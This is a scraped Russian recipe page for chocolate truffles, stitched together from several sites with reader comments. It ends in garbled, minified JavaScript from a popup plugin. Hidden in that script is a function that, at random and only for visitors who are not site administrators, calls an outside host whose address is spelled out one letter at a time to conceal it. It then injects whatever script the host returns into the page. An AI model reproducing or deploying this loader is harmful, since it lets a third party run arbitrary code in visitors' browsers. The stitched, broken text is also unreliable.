Шоколадные трюфели

Шоколадные трюфели всего из двух ингредиентов. И никакой возни с духовкой

Пожалуй, этот рецепт можно отнести к одному из простейших. Никаких специфических ингредиентов, никакой возни с духовкой, а само приготовление осуществляется по принципу «смешал и готово». Разве можно сделать вкусные конфеты проще? Оцените восхитительный рецепт приготовления шоколадных трюфелей всего из двух ингредиентов — какао и сгущёнки! Выберите пропорцию ингредиентов, которая вам больше по вкусу — очень сладкие или очень шоколадные конфеты.

Для более сладких трюфелей:

  • 160 мл сгущенного молока;
  • 40 гр какао-порошка + какао для посыпки.

Для насыщенного шоколадного вкуса:

  • 100 мл сгущённого молока;
  • 50 гр какао + какао для посыпки.

В обоих вариантах технология приготовления конфет одна и та же:

1. Форму застелите пищевой плёнкой.

Youtube | Cooking tree 쿠킹트리

2. Подогрейте сгущёнку в микроволновке в течение 30 секунд. Затем в чаше смешайте сгущёнку и просеянное через мелкое сито какао. Должна получиться густая шоколадная масса без комочков.

Youtube | Cooking tree 쿠킹트리

3. Перелейте шоколадную массу в форму. Поставьте в холодильник на час.

Youtube | Cooking tree 쿠킹트리

4. Просейте немного какао-порошка на стол. Сверху выложите застывшую шоколадную массу, уберите пищевую плёнку. Также сверху присыпьте какао.

Youtube | Cooking tree 쿠킹트리

5. Разрежьте на порционные кусочки. Присыпьте края какао и сформируйте пальцами аккуратные квадраты.

6. Либо вы можете нарезать их на кусочки и скатать в шарики, после чего обвалять в какао-порошке.

Youtube | Cooking tree 쿠킹트리

Шоколадные трюфели из двух ингредиентов готовы! Приятного аппетита.

Youtube | Cooking tree 쿠킹트리 Youtube | Cooking tree 쿠킹트리

Подробнее о том, как сделать конфеты из сгущёнки и какао, смотрите в видео ниже:

Шоколадный трюфель

Сегодня Chocolatery.net хочет познакомить вас с еще одним видом шоколадных конфет, которые не только прекрасно смотрятся на столе и радуют своим превосходным вкусом, но еще и легко готовятся в домашних условиях. И это прекрасное во всех пониманиях чудо называется шоколадным трюфелем.

Впервые шоколадный трюфель появился в 1895 году во Франции в городе Шамбери. Но широкую популярность он получили только несколько лет спустя, после того как в Англии в Лондоне в 1902 году был открыт магазин, специализирующийся на шоколадных конфетах, а в особенности на шоколадных трюфелях.

Трюфель – это круглая шоколадная конфета с начинкой из ганаша, обсыпанная какао. Эти конфеты получили свое название благодаря грибу трюфель, с которым слега похожи внешне из-за какао-обсыпки. Но шоколадный трюфель обсыпают не только какао-порошком, но также обваливают в мелкомолотых орехах, вафельной крошке, кокосовой стружке, сахарной пудре, а также украшают узорами. Да и в сам ганаш иногда добавляют различные добавки от орехов и цукатов до алкогольных напитков: ром, ликер, коньяк.

В большинстве случаев ганаш готовят с применением сливок, но иногда их заменяют молоком, фруктовым пюре или соком, тогда шоколадные трюфеля получаются не такие калорийные.

Для шоколадных трюфелей можно использовать как черный горький шоколад, так и молочный или белый.

Читать еще:  Салат с корейской морковкой и курицей рецепт

Chocolatery.net представляет несколько рецептов шоколадных трюфелей, которые легко и быстро можно приготовить дома.

Рецепт № 1. Шоколадные трюфеля с коньяком.

Ингредиенты:

  • 2 плитки горького шоколада;
  • 200 грамм жирных сливок не менее 30 % жирности;
  • 30 грамм сливочного масла;
  • 2 столовые ложки коньяка;
  • какао-порошок для обсыпки.
  1. Сливки довести до кипения, но ни в коем случае не кипятить длительно.
  2. Затем добавить в них натертый на терке шоколад. Лучше тереть на мелкой терке, так он быстрее растает.
  3. Шоколад перемешать со сливками до получения однородной массы. Если шоколад сразу не растаял, то поместить массу на водяную баню и перемешивать до тех пор, пока шоколад полностью не растает и масса не станет гладкой и блестящей.
  4. Шоколадную массу слегка остудить и добавить сливочное масло, нарезанное мелкими кусочками, снова все перемешать.
  5. Затем влить коньяк и снова перемешать. Ганаш готов.
  6. Пометить его в холодильник на 6-8 часов. Он должен выстояться, тогда станет более плотным.
  7. После того как ганаш настоится, следует из него сформировать небольшие шарики. Для этого лучше всего использовать латексные перчатки. Также нужно следить за тем, чтобы руки были холодными, иначе ганаш очень быстро начинает таять. После того, как шарики сформированы, их следует запанировать в какао-порошке.

Рецепт № 2. Шоколадные трюфеля с фисташками.

Ингредиенты:

  • 2 плитки шоколада;
  • 100 мл сливок;
  • 10 грамм ванилина;
  • 2 столовые ложки рома или ликера;
  • 100 грамм фисташек;
  • какао-порошок;
  • кокосовая стружка.
  1. Приготовить ганаш можно так же, как в предыдущем рецепте. Только в шоколадную массу следует добавить еще ваниль и измельченные орехи и все хорошо перемешать.
  2. Массу поместить в холод.
  3. Затем также сформировать шарики и часть из них обсыпать какао-порошком, а часть – кокосовой стружкой.

Рецепт № 3. Шоколадные трюфеля в белом шоколаде.

Ингредиенты:

  • 2 плитки черного шоколада;
  • 1 плитка белого шоколада;
  • 30 грамм сливочного масла;
  • 100 мл жирных сливок;
  • 50 грамм орехов.

Chocolatery.net расскажет еще один способ, как приготовить ганаш.

  1. Шоколад растопить на водяной бане.
  2. Отдельно взбить сливки, добавить растаявшее сливочное масло и все хорошо перемешать до однородной массы.
  3. Затем в сливки тонкой струйкой влить растаявший шоколад, хорошо перемешивая.
  4. Потом добавить виски или другой алкоголь и хорошо взбить массу венчиком.
  5. Измельчить орехи. Можно использовать любые орехи.
  6. Добавить орехи в шоколадную массу и снова все хорошо перемешать.
  7. Готовый ганаш поставить в холодильник на 1-2 часа, чтобы масса уплотнилась и стала более эластичной.
  8. Белый шоколад натереть на мелкой терке.
  9. Делая из ганаша шарики, сразу же обваливать их в крошке из белого шоколада.
  10. Конфеты можно уложить в бумажные вазочки и поставить в холодильник, чтобы остыли.

Кстати, шоколадные трюфеля следует хранить в холодильнике не более 2-3 дней, однако Chocolatery.net уверен, что такой деликатес хранить долго не придется!

Chocolatery.net желает шоколадного аппетита!

И пусть у вас будет в шоколаде!

Французский десерт в вариациях: 10 рецептов трюфелей от «Едим Дома»

Существует несколько версий появления знаменитых французских конфет трюфелей. По одной из них, впервые это шоколадное угощение приготовил кулинар Огюст Эскофье в 1920 году. Конфеты получились в результате оплошности, которую допустил его ученик. Согласно второй версии, автором рецепта трюфелей стал француз Луи Дюфур еще в 1895 году. Он придумал этот десерт в преддверии Рождества. Из сливок, шоколада и какао-порошка получились невероятно вкусные конфеты, которые вскоре стали популярными не только во Франции, но и за ее пределами. Со временем классический рецепт изменился, и сейчас можно попробовать трюфели с разными начинками, посыпками, а также постные варианты. Этот известный на весь мир десерт легко сделать и в домашних условиях. В нашей новой подборке мы предлагаем десять разных рецептов. Обязательно приготовьте такие конфеты! Ваши близкие будут в восторге!

Миндальные трюфели с черносливом

Начнем нашу подборку с интересного рецепта трюфелей от автора Ольги. Она приготовила полезные конфеты с орехами и сухофруктами. Это прекрасный вариант для поклонников правильного питания. Минимум ингредиентов, легкость приготовления — что может быть лучше?!

Трюфели «Орео»

Автор Юлия предлагает сделать трюфели на основе шоколадного печенья. А для глазури можно использовать и белый шоколад, тогда получится интересный контраст. Такие конфетки будут очень хороши в качестве сладкого подарка для близких и друзей.

Кокосовые трюфели

«Если вы любите белый шоколад и кокос, то эти трюфели вам непременно понравятся», — пишет автор Элеонора. Для начинки можно использовать и другие орехи. А хранить десерт лучше в холодильнике.

Трюфели с авокадо

Если вы хотите попробовать трюфели без добавления сливок или масла, вам подойдет рецепт автора Оксаны. Вы удивитесь, но в составе лакомства есть авокадо! Десерт получается очень вкусным и даже полезным.

Трюфели с абрикосовым пюре, курагой и ромом

Домашние трюфели — это не так уж и сложно, как кажется на первый взгляд. Нужно всего ничего — качественный шоколад, терпение и фантазия. Ведь прелесть этих конфет состоит в том, что в ганаш, из которого как раз и делаются трюфели, можно добавить все, что вы любите, — алкоголь, цукаты, орешки… Готовим вместе с автором Евгенией!

Трюфели с мятным шлейфом

Сочетание шоколада и мяты — очень удачная идея! Так почему бы не сделать конфеты с легким освежающим привкусом? Автор Елена делится с нами оригинальной идеей и проверенным рецептом. Попробуйте, будет очень вкусно!

Шоколадные трюфели по рецепту Юлии Высоцкой

В рецепте шоколадных трюфелей от Юлии Высоцкой используется алкоголь. Вместо виски можно добавить ром или коньяк. Если готовите лакомство для детей, этот ингредиент полностью исключите.

Творожные трюфели

Еще один интересный рецепт от автора Юлии. «На приготовление этих конфет уходит всего лишь 30 минут, а результат вас обязательно порадует! Трюфели получаются очень нежные, со сливочным вкусом и легким оттенком ириски, наверное, из-за добавления сгущенного молока».

Трюфели с имбирем и апельсиновым соком

Побаловать себя простым, необычным, изысканным десертом — это так легко! А если такие конфеты красиво упаковать и положить в коробочку, получится замечательный подарок для ваших родных и друзей. Готовьте и наслаждайтесь! Благодарим за рецепт автора Евгению!

Трюфели «Тирамису»

Очень вкусные и нежные домашние трюфели со вкусом тирамису помогут приятно разнообразить праздничный стол. Рецептом с нами делится автор Наталья.

Благодарим всех авторов за интересные рецепты! Готовьте с удовольствием!

Шоколадные трюфели

Домашние трюфели – отличный подарок. Упакованные в коробки, они хранятся в холодильнике 3 дня. Их можно и заморозить, но размораживать следует не при комнатной температуре, а в среднем отделении холодильника.

  • 20 г сливочного размягченного масла
  • 2 ст. л. рома или бренди
  • 200 г горького шоколада (не меньше 75% какао)
  • 150 г сливок жирностью 35%
  • 2 ст. л. толченых несоленых орехов
  • 1 ст. л. какао-порошка
  • 0,5 ч. л. сливочного масла

ПОШАГОВЫЙ РЕЦЕПТ ПРИГОТОВЛЕНИЯ

Сливки Parmalat CHEF приготовлены по особой рецептуре компании “Пармалат” из натурального коровьего молока, обладают прекрасными вкусовыми и питательными свойствами, не содержат консервантов. Используются и любимы профессиональными поварами благодаря их стабильности и высокому качеству. Идеально подходят для тех, кто хочет готовить дома, как в ресторане!

Вкус трюфелей зависит от качества шоколада, а также от алкоголя. Помимо рома и бренди, добавляют водку или виски, а вот ликеров с ярко выраженным вкусом лучше избегать

Ключевые слова

Необычайно красивый и воздушный десерт. А украшения для него можно делать всей семьей – .

сложно

Шоколадом, по мнению Марины Цветаевой, можно лечить печаль. А если вы задумаете добавить его в какое .

средне

Не нужно быть великим кондитером, чтобы сделать шоколадные трюфели дома. Для них даже шоколад .

Рецепт очень хороший, все лепится отлично, хоть в муку шоколад я не молола, а просто растопила с остальными ингредиентами. Выглядит достойно и презентабельно. Но, вкус мне не очень понравился так как слишком горькими они получились. Следующий раз буду делать с молочным шоколадом или хотя бы %40-50 какао, после очередного рецепта я поняла, что горький шоколад в десертах – пусть и за правило берется, но на любителя, так как портит все восприятие, что в трюфелях, что в каждой глазури, которой я покрывала торт, кексы и т.д..

Вместо сливок сделала молоко, получилось))готовила ко дню рождения мамы, ей очень понравилось))

Сливки заменить нельзя

Скажите пожалуйста можно ли сливки сметаной заменить или чем можно заменить?

Делала по такому рецепту, только слегка скорректировав пропорции. На 200 гр горького шоколада 200 мл 33% сливок и примерно 30 гр сливочного масла. Трюфели получились просто волшебные.

Перед тем, как формировать комочки, я бы рекомендовала подержать массу в холодильнике, потом комочки получаются отличные))

народ, а у ког-нибудь были проблемы с консистенцией? как-то очень уж жидко, не могу сформировать шарики(((

Делали сегодня по рецепту, масла положили

50 грамм, больше не надо, а то слипнется ^_^

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};